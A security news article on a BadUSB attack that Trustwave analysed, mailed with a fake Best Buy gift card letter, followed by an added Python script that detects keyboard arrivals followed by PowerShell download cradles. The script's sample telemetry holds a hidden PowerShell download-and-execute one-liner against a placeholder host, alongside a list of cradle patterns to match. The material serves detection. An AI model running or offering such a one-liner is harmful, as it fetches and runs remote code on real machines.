27 March 2020

Rare BadUSB attack detected in the wild

Security researchers at Trustwave have published details of an attempted USB drive-based attack on one of their unnamed clients. The attack began when the company received an envelope containing a fake Best Buy gift card, along with a USB thumb drive.

The accompanying letter claimed to be from Best Buy, giving out a $50 gift card to loyal customers, and invited the recipient to plug in the USB drive, which purportedly contained a list of items the gift card could be used for.

In reality, the USB drive was what security researchers call a "BadUSB": a device whose firmware or microcontroller has been programmed to present itself to the host as something other than what it looks like, most often a keyboard. Because the operating system trusts a keyboard by default, the device can type arbitrary commands the moment it is plugged in, with no user interaction beyond inserting it. It is not invisible, though: the injected commands run in the context of the logged-in user and leave the same process-creation telemetry as anything typed by hand.

The analysed USB device was built around an ATmega32U4, the Atmel AVR microcontroller with native USB support found on several Arduino boards, and was programmed to enumerate as a USB keyboard (HID) and automatically inject malicious commands.

Once the researchers plugged the BadUSB device into a test workstation, the emulated keyboard launched a PowerShell script, which downloaded a second PowerShell script and JScript code that collects system information from the infected host (username, hostname, the user's privilege level, domain name, OS information, and the list of installed applications and running processes). The gathered data is then sent to the command-and-control (C2) server, after which the malware enters a loop awaiting further instructions from the C2.
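The chain above (a new keyboard-class device appears, and seconds later PowerShell runs a download-and-execute one-liner under the same user) is what a detection engineer would correlate on. The following is an added example, not code from Trustwave or the original report: it parses a constructed key=value telemetry format standing in for Sysmon or EDR device-arrival and process-creation events, flags PowerShell command lines containing common download-cradle patterns, and raises an alert only when such a process starts within a short window of a keyboard arrival for the same user. The sample records, the field names, the 30-second window and the VID/PID string are all assumptions chosen for illustration.

```python
"""Correlate a newly attached USB keyboard with a PowerShell download
cradle launched shortly afterwards.

Added example, not code from Trustwave or the original article. The
event format and the sample records below are constructed; map the
fields to your own telemetry (device arrival events and process-creation
events carrying parent, command line and user).
"""
import re
from datetime import datetime, timedelta

# Constructed sample telemetry: a keyboard-class USB device arrives and,
# three seconds later, explorer.exe (the parent of anything typed into
# the Run dialog) spawns powershell.exe with a download cradle. The last
# record is a benign scheduled script included as a negative case.
# The VID/PID string is illustrative; a malicious device can present any IDs.
SAMPLE_EVENTS = r"""
2020-03-27T10:02:11 type=device_arrival class=Keyboard id=USB\VID_2341&PID_8036\0000 user=ACME\jsmith
2020-03-27T10:02:13 type=process_create image=C:\Windows\explorer.exe parent=C:\Windows\System32\userinit.exe cmd="explorer.exe" user=ACME\jsmith
2020-03-27T10:02:14 type=process_create image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parent=C:\Windows\explorer.exe cmd="powershell -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2.ps1')" user=ACME\jsmith
2020-03-27T11:15:40 type=process_create image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parent=C:\Windows\explorer.exe cmd="powershell -File C:\scripts\backup.ps1" user=ACME\jsmith
"""

# Substrings commonly seen in one-line PowerShell stagers (matched case-insensitively).
CRADLE_PATTERNS = [
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"invoke-expression", r"\biex\b", r"net\.webclient", r"frombase64string",
    r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
]
CRADLE_RE = re.compile("|".join(CRADLE_PATTERNS), re.IGNORECASE)

SHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_events(text):
    """Parse 'TIMESTAMP key=value ...' lines into dicts with a datetime 'ts'."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts_str, _, rest = line.partition(" ")
        ev = {"ts": datetime.fromisoformat(ts_str)}
        for key, value in FIELD_RE.findall(rest):
            ev[key] = value.strip('"')
        events.append(ev)
    return events


def looks_like_cradle(cmdline):
    """True when a command line contains a download-and-execute pattern."""
    return CRADLE_RE.search(cmdline) is not None


def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def find_badusb_chains(events, window_seconds=30):
    """Return alerts for keyboard arrivals followed within window_seconds by a
    PowerShell download cradle run under the same user.

    The window is a tuning assumption: a keystroke-injecting device types its
    payload within seconds of enumeration, while a person rarely pastes a
    cradle that quickly after plugging in a keyboard.
    """
    window = timedelta(seconds=window_seconds)
    alerts = []
    arrivals = [e for e in events
                if e.get("type") == "device_arrival" and e.get("class") == "Keyboard"]
    procs = [e for e in events if e.get("type") == "process_create"]
    for arrival in arrivals:
        for proc in procs:
            delta = proc["ts"] - arrival["ts"]
            if not (timedelta(0) <= delta <= window):
                continue
            if basename(proc.get("image", "")) not in SHELL_IMAGES:
                continue
            if proc.get("user") != arrival.get("user"):
                continue
            if not looks_like_cradle(proc.get("cmd", "")):
                continue
            alerts.append({
                "device_id": arrival.get("id"),
                "user": proc.get("user"),
                "parent": proc.get("parent"),
                "cmd": proc.get("cmd"),
                "seconds_after_arrival": delta.total_seconds(),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_badusb_chains(parse_events(SAMPLE_EVENTS)):
        print(f"[ALERT] {alert['user']}: keyboard {alert['device_id']} followed "
              f"{alert['seconds_after_arrival']:.0f}s later by: {alert['cmd']}")
```

Run stand-alone it prints one alert for the constructed powershell.exe record and stays silent on the benign scheduled script. The pattern list is deliberately narrow; in production, pair this correlation with a device allowlist (block unknown HID keyboards by instance ID or vendor ID) so that the device is refused before it gets a chance to type anything.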

“These types of USB devices are widely known and used by security professionals. The fact that they are also cheap and readily available to anyone meant that it was just a matter of time to see this technique used by criminals "in the wild." Since USB devices are ubiquitous, used, and seen everywhere, some consider them innocuous and safe. Others can be very curious about the contents of an unknown USB device. If this story teaches us anything, it's that one should never trust such a device,” the researchers conclude.
